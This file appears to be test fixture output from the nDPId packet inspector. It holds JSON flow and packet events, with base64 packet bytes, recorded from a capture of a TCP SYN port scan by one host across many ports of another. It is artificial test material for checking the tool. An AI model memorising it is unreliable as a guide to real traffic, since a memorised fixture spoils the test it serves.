+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsyIQAACkGVu6sEAAIQA2GNIzSBEfdUoMYAAAAAGACCAAsSAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsROwAADEG0oasEAAIQA2GNIzSBCjdUoMYAAAAAGACCAAsZwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsBKEAACYGHdKsEAAIQA2GNIzSBFfdUoMYAAAAAGACDAAoOAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsbn0AACgGsfWsEAAIQA2GNIzSIcndUoMYAAAAAGACBAASxgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAskbgAACwGirqsEAAIQA2GNIzSCDPdUoMYAAAAAGACBAAsXAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsrooAADsGXuisEAAIQA2GNIzSAv3dUoMYAAAAAGACEAAlkgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAs9kUAADAGIi2sEAAIQA2GNIzSIzLdUoMYAAAAAGACBAARXQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsPSYAADMG2EysEAAIQA2GNIzSI2\/dUoMYAAAAAGACEAAFIAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsda8AACkGqcOsEAAIQA2GNIzTwAPdU4MZAAAAAGACCABwiAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsQxYAADYGz1ysEAAIQA2GNIzTCI7dU4MZAAAAAGACDAAj\/gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsrvQAADUGZH6sEAAIQA2GNIzTC7ndU4MZAAAAAGACCAAk0wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsMq8AACsG6sOsEAAIQA2GNIzTGbTdU4MZAAAAAGACEAAO2AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAs05oAADgGPNisEAAIQA2GNIzTBi\/dU4MZAAAAAGACBAAuXQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/+QAADUGE46sEAAIQA2GNIzTatvdU4MZAAAAAGACCADFsAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsD6EAADkG\/9GsEAAIQA2GNIzTJqrdU4MZAAAAAGACCAAJ4gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsihkAACcGl1msEAAIQA2GNIzTFsHdU4MZAAAAAGACEAARywAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsQFEAADgG0CGsEAAIQA2GNIzTBmndU4MZAAAAAGACBAAuIwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAs+A4AACkGJ2SsEAAIQA2GNIzTgADdU4MZAAAAAGACCACwiwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsyBsAADAGUFesEAAIQA2GNIzTJWfdU4MZAAAAAGACBAAPJQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsr+YAAC4GaoysEAAIQA2GNIzTBBPdU4MZAAAAAGACDAAoeQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsVHsAAC4GxfesEAAIQA2GNIzTD6DdU4MZAAAAAGACDAAc7AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058406,"pkt":"ACYLMQczACWzv5HuCABFAAAsv0EAADsGTjGsEAAIQA2GNIzTBZndU4MZAAAAAGACEAAi8wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058406,"pkt":"ACYLMQczACWzv5HuCABFAAAsnBAAADUGd2KsEAAIQA2GNIzTGg3dU4MZAAAAAGACCAAWfwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAssvkAAC0GaHmsEAAIQA2GNIzTI2\/dU4MZAAAAAGACCAANHQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsYaYAACsGu8ysEAAIQA2GNIzTIzLdU4MZAAAAAGACEAAFWgAAAgQFtA=="} 